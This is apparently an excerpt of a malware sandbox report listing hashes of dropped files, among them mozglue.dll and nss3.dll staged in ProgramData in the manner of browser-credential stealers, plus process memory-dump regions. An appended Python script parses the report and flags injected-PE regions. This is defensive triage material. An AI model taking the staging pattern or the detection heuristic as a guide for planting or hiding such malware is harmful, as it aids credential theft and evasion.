SHA2569b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\rtKwu.vjJMD5
e277cbe00c6606584bce930b2f3218c9
SHA16d09be44853b22c9f80cba50bbc4fff89f060f47
SHA256c8d287f65ccac6630495d8d41ca85c51b3c9cc76b6c492bd4894df57339ccfd9
SHA51286d17f539da1a73f7dc25f2128a4df933246f976ad66b6ec04ecc4219a3079d061df6ed5529c075c400db2f52d3e2cf6f18325f75d4e46f55030557e71159229
-
C:\Users\Admin\AppData\Local\Temp\f3OS.HMD5
cfb22a4a48cf1c24eeef631e67283d56
SHA1744aeeaaf90e106bbf75221c9d4fad46932ce982
SHA25655cc67642bf23f39a6aeeb46155b73379ff86a9153f904ff3177f5c3b131b077
SHA5126e43366f8f283337b13dda1979fb440434b71b67772414cc050075d31ece46b2b4c8df2ebc7f586b53aff9cf1dc309539af45ad513916a46cc074e4eaec6d1a4
-
C:\Users\Admin\AppData\Roaming\egfsuevMD5
d985b4cfdceecc3c0fe4f3e4fda4e416
SHA1f3c14a4d87569e54faaf0eac73ec1aafa2621dfa
SHA256a8b37d6b073ee045ae63473cb1a592c974e896b19e3db06d552f955901c06db7
SHA512560a056c076db6893f6407807d9a10d1078c148aa588d9de6ce1874eeac0a4feaf2102b656ba96316a32c89df97986f20cf77e55117e2c9bf97e52ef3381335c
-
C:\Users\Admin\AppData\Roaming\egfsuevMD5
d985b4cfdceecc3c0fe4f3e4fda4e416
SHA1f3c14a4d87569e54faaf0eac73ec1aafa2621dfa
SHA256a8b37d6b073ee045ae63473cb1a592c974e896b19e3db06d552f955901c06db7
SHA512560a056c076db6893f6407807d9a10d1078c148aa588d9de6ce1874eeac0a4feaf2102b656ba96316a32c89df97986f20cf77e55117e2c9bf97e52ef3381335c
-
\ProgramData\mozglue.dllMD5
8f73c08a9660691143661bf7332c3c27
SHA137fa65dd737c50fda710fdbde89e51374d0c204a
SHA2563fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA5120042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89
-
\ProgramData\nss3.dll
MD5
bfac4e3c5908856ba17d41edcd455a51
SHA1
8eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256
e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA512
2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
\Users\Admin\AppData\Local\Temp\F3Os.H
MD5
cfb22a4a48cf1c24eeef631e67283d56
SHA1
744aeeaaf90e106bbf75221c9d4fad46932ce982
SHA256
55cc67642bf23f39a6aeeb46155b73379ff86a9153f904ff3177f5c3b131b077
SHA512
6e43366f8f283337b13dda1979fb440434b71b67772414cc050075d31ece46b2b4c8df2ebc7f586b53aff9cf1dc309539af45ad513916a46cc074e4eaec6d1a4
-
memory/352-224-0x0000000000000000-mapping.dmp
-
memory/360-151-0x0000000004DC0000-0x0000000004DC1000-memory.dmp
Filesize
4KB
-
memory/360-149-0x0000000005210000-0x0000000005211000-memory.dmp
Filesize
4KB
-
memory/360-144-0x0000000000400000-0x0000000000420000-memory.dmp
Filesize
128KB
-
memory/360-145-0x0000000000418EEA-mapping.dmp
-
memory/360-150-0x0000000004C90000-0x0000000004C91000-memory.dmp
Filesize
4KB
-
memory/360-167-0x0000000006940000-0x0000000006941000-memory.dmp
Filesize
4KB
-
memory/360-168-0x0000000007040000-0x0000000007041000-memory.dmp
Filesize
4KB
-
memory/360-153-0x0000000004CF0000-0x0000000004CF1000-memory.dmp
Filesize
4KB
-
memory/360-159-0x0000000005C10000-0x0000000005C11000-memory.dmp
Filesize
4KB
-
memory/360-156-0x0000000005080000-0x0000000005081000-memory.dmp
Filesize
4KB
-
memory/360-154-0x0000000004C00000-0x0000000005206000-memory.dmp
Filesize
6.0MB
-
memory/360-155-0x0000000004D30000-0x0000000004D31000-memory.dmp
Filesize
4KB
-
memory/376-127-0x00000000023B0000-0x000000000245E000-memory.dmp
Filesize
696KB
-
memory/376-120-0x0000000000000000-mapping.dmp
-
memory/724-118-0x0000000000402DD8-mapping.dmp
-
memory/724-117-0x0000000000400000-0x0000000000409000-memory.dmp
Filesize
36KB
-
memory/832-199-0x0000000000400000-0x00000000023C4000-memory.dmp
Filesize
31.8MB
-
memory/832-215-0x0000000006B44000-0x0000000006B46000-memory.dmp
Filesize
8KB
-
memory/832-213-0x0000000006B40000-0x0000000006B41000-memory.dmp
Filesize
4KB
-
memory/832-201-0x0000000004300000-0x000000000432D000-memory.dmp
Filesize
180KB
-
memory/832-208-0x00000000043C0000-0x00000000043EC000-memory.dmp
Filesize
176KB
-
memory/832-183-0x0000000000000000-mapping.dmp
-
memory/832-217-0x00000000076F0000-0x00000000076F1000-memory.dmp
Filesize
4KB
-
memory/832-198-0x00000000024D0000-0x000000000261A000-memory.dmp
Filesize
1.3MB
-
memory/832-218-0x0000000006B43000-0x0000000006B44000-memory.dmp
Filesize
4KB
-
memory/832-216-0x0000000006B42000-0x0000000006B43000-memory.dmp
Filesize
4KB
-
memory/840-225-0x0000000000000000-mapping.dmp
-
memory/1104-190-0x0000000000000000-mapping.dmp
-
memory/1116-209-0x0000000000000000-mapping.dmp
-
memory/1236-226-0x0000000000000000-mapping.dmp
-
memory/1260-193-0x00000000004C0000-0x00000000004C7000-memory.dmp
Filesize
28KB
-
memory/1260-194-0x00000000004B0000-0x00000000004BC000-memory.dmp
Filesize
48KB
-
memory/1260-189-0x0000000000000000-mapping.dmp
-
memory/1364-220-0x0000000000000000-mapping.dmp
-
memory/1712-166-0x0000000000400000-0x0000000000491000-memory.dmp
Filesize
580KB
-
memory/1712-164-0x00000000005C0000-0x000000000070A000-memory.dmp
Filesize
1.3MB
-
memory/1712-165-0x0000000002120000-0x00000000021AF000-memory.dmp
Filesize
572KB
-
memory/1712-161-0x0000000000000000-mapping.dmp
-
memory/1892-169-0x0000000000000000-mapping.dmp
-
memory/1892-172-0x0000000002590000-0x00000000025F0000-memory.dmp
Filesize
384KB
-
memory/1980-192-0x0000000000190000-0x00000000001FB000-memory.dmp
Filesize
428KB
-
memory/1980-191-0x0000000000400000-0x0000000000474000-memory.dmp
Filesize
464KB
-
memory/1980-186-0x0000000000000000-mapping.dmp
-
memory/2232-222-0x0000000000000000-mapping.dmp
-
memory/2316-125-0x0000000000402DD8-mapping.dmp
-
memory/2452-116-0x00000000040C0000-0x00000000040C9000-memory.dmp
Filesize
36KB
-
memory/2640-255-0x0000000000400000-0x0000000000433000-memory.dmp
Filesize
204KB
-
memory/2820-204-0x0000000000270000-0x0000000000271000-memory.dmp
Filesize
4KB
-
memory/2820-203-0x0000000000270000-0x0000000000271000-memory.dmp
Filesize
4KB
-
memory/2820-200-0x0000000000000000-mapping.dmp
-
memory/3052-173-0x0000000000000000-mapping.dmp
-
memory/3052-182-0x0000000002958000-0x00000000029D4000-memory.dmp
Filesize
496KB
-
memory/3052-188-0x0000000000400000-0x00000000027E5000-memory.dmp
Filesize
35.9MB
-
memory/3052-187-0x00000000043F0000-0x00000000044C5000-memory.dmp
Filesize
852KB
-
memory/3056-256-0x0000000005220000-0x0000000005236000-memory.dmp
Filesize
88KB
-
memory/3056-152-0x0000000002800000-0x0000000002816000-memory.dmp
Filesize
88KB
-
memory/3056-134-0x00000000027C0000-0x00000000027D6000-memory.dmp
Filesize
88KB
-
memory/3056-119-0x00000000005A0000-0x00000000005B6000-memory.dmp
Filesize
88KB
-
memory/3064-219-0x0000000000000000-mapping.dmp
-
memory/3188-221-0x0000000000000000-mapping.dmp
-
memory/3320-223-0x0000000000000000-mapping.dmp
-
memory/3328-137-0x0000000000000000-mapping.dmp
-
memory/3328-141-0x0000000000680000-0x0000000000689000-memory.dmp
Filesize
36KB
-
memory/3328-140-0x0000000000620000-0x0000000000628000-memory.dmp
Filesize
32KB
-
memory/3328-142-0x0000000000400000-0x0000000000433000-memory.dmp
Filesize
204KB
-
memory/3608-136-0x0000000005610000-0x0000000005611000-memory.dmp
Filesize
4KB
-
memory/3608-135-0x0000000005450000-0x0000000005451000-memory.dmp
Filesize
4KB
-
memory/3608-133-0x0000000005490000-0x0000000005491000-memory.dmp
Filesize
4KB
-
memory/3608-131-0x0000000000B40000-0x0000000000B41000-memory.dmp
Filesize
4KB
-
memory/3608-128-0x0000000000000000-mapping.dmp
-
memory/3608-143-0x0000000005B20000-0x0000000005B21000-memory.dmp
Filesize
4KB
-
memory/3800-180-0x00000000008C0000-0x00000000008C1000-memory.dmp
Filesize
4KB
-
memory/3800-179-0x00000000008C0000-0x00000000008C1000-memory.dmp
Filesize
4KB
-
memory/3800-177-0x0000000000000000-mapping.dmp
-
memory/3996-206-0x0000000000000000-mapping.dmp
-
memory/4084-235-0x00000000009B0000-0x00000000009B1000-memory.dmp
Filesize
4KB
-
memory/4084-234-0x0000000004360000-0x0000000004480000-memory.dmp
Filesize
1.1MB
-
memory/4084-248-0x0000000004A00000-0x0000000004AB6000-memory.dmp
Filesize
728KB
-
memory/4084-249-0x0000000004B80000-0x0000000004C35000-memory.dmp
Filesize
724KB
-
memory/4084-250-0x0000000004C40000-0x0000000004CEF000-memory.dmp
Filesize
700KB
-
memory/4084-251-0x0000000004CF0000-0x0000000004D8B000-memory.dmp
Filesize
620KB
-
memory/4084-230-0x0000000000000000-mapping.dmp
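The dropped-file and memory-dump listings above are flat report fields: a path or dump name, then label and value lines, with entries separated by a lone "-". As an added example that is not part of the report or of any sandbox's own tooling, the Python below parses entries in that layout, recomputes each memory region's size from its address range to cross-check the printed Filesize, validates digest lengths before the hashes go into a hunt query, and flags the one shape that most often means an injected PE: a region at the default 32-bit image base 0x00400000 whose process also has a mapping address inside it. The dump-name layout (memory/pid-event-start-end-memory.dmp and memory/pid-event-addr-mapping.dmp) and the image-base heuristic are assumptions inferred from the listing, not something the report states; the sample input is constructed from a few of the report's own entries.

```python
"""Added example, not part of the sandbox report or its tooling: parse the
flattened dropped-file and memory-dump listings above, cross-check printed
Filesize values against the address range, validate digest lengths, and flag
regions shaped like an injected PE. Assumptions inferred from the listing:
dump names are memory/<pid>-<event>-0x<start>-0x<end>-memory.dmp or
memory/<pid>-<event>-0x<addr>-mapping.dmp; 0x00400000 as the default 32-bit
PE image base is a heuristic, not something the report states."""
import re
from dataclasses import dataclass, field
from typing import Optional

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
DEFAULT_IMAGE_BASE = 0x00400000  # heuristic, see docstring
DUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<event>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"(?:-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp|-mapping\.dmp)$")

# Constructed sample: entries copied from the report, one field per line, entries separated by "-".
SAMPLE_REPORT = r"""
C:\Users\Admin\AppData\Local\Temp\f3OS.H
MD5
cfb22a4a48cf1c24eeef631e67283d56
SHA1
744aeeaaf90e106bbf75221c9d4fad46932ce982
SHA256
55cc67642bf23f39a6aeeb46155b73379ff86a9153f904ff3177f5c3b131b077
-
memory/360-144-0x0000000000400000-0x0000000000420000-memory.dmp
Filesize
128KB
-
memory/360-145-0x0000000000418EEA-mapping.dmp
-
memory/832-199-0x0000000000400000-0x00000000023C4000-memory.dmp
Filesize
31.8MB
-
memory/832-183-0x0000000000000000-mapping.dmp
-
"""

@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)  # label -> lowercase hex digest

@dataclass
class MemoryDump:
    pid: int
    event: int
    start: int
    end: Optional[int]            # None for -mapping.dmp entries
    reported_size: Optional[str]  # printed Filesize, if any

    @property
    def size(self) -> Optional[int]:
        return None if self.end is None else self.end - self.start

def human_size(n: int) -> str:
    """Mirror the report's formatting: whole KB below 1 MB, else one decimal MB."""
    return f"{n // 1024}KB" if n < 1 << 20 else f"{n / (1 << 20):.1f}MB"

def parse_report(text: str):
    files, dumps = [], []
    for block in re.split(r"^-$", text, flags=re.M):
        lines = [ln.strip() for ln in block.splitlines() if ln.strip()]
        if not lines:
            continue
        m = DUMP_RE.match(lines[0])
        if m:
            size = lines[2] if len(lines) > 2 and lines[1] == "Filesize" else None
            dumps.append(MemoryDump(int(m["pid"]), int(m["event"]), int(m["start"], 16),
                                    int(m["end"], 16) if m["end"] else None, size))
        else:  # dropped file: path, then alternating label / digest lines
            f = DroppedFile(lines[0])
            for label, digest in zip(lines[1::2], lines[2::2]):
                f.hashes[label] = digest.lower()
            files.append(f)
    return files, dumps

def bad_hashes(f: DroppedFile) -> list:
    """Labels whose digest has the wrong length or non-hex characters; a
    truncated hash pasted into a hunt query silently matches nothing."""
    return [lbl for lbl, dg in f.hashes.items() if lbl in HASH_LEN
            and (len(dg) != HASH_LEN[lbl] or not re.fullmatch(r"[0-9a-f]+", dg))]

def size_mismatches(dumps) -> list:
    """Dumps whose address range disagrees with the printed Filesize."""
    return [d for d in dumps if d.end is not None and d.reported_size
            and human_size(d.size) != d.reported_size]

def injected_images(dumps) -> list:
    """(pid, event, entry) for regions at the default image base whose process
    also has a non-zero mapping address inside them: the usual shape of a
    hollowed or injected PE."""
    entries = sorted((d.pid, d.start) for d in dumps if d.end is None and d.start)
    return [(d.pid, d.event, addr) for d in dumps
            if d.end is not None and d.start == DEFAULT_IMAGE_BASE
            for pid, addr in entries if pid == d.pid and d.start < addr < d.end]
```

On the constructed sample, `injected_images` returns process 360's region 144 with its mapping address 0x418EEA, while process 832's large region at the same base is not flagged because its only mapping entry is the null address. Run over the full listing, the same functions give a short list of (pid, event) pairs whose dumps are worth pulling first, and any size mismatch or bad digest length is a sign the report text was damaged in extraction rather than a property of the sample.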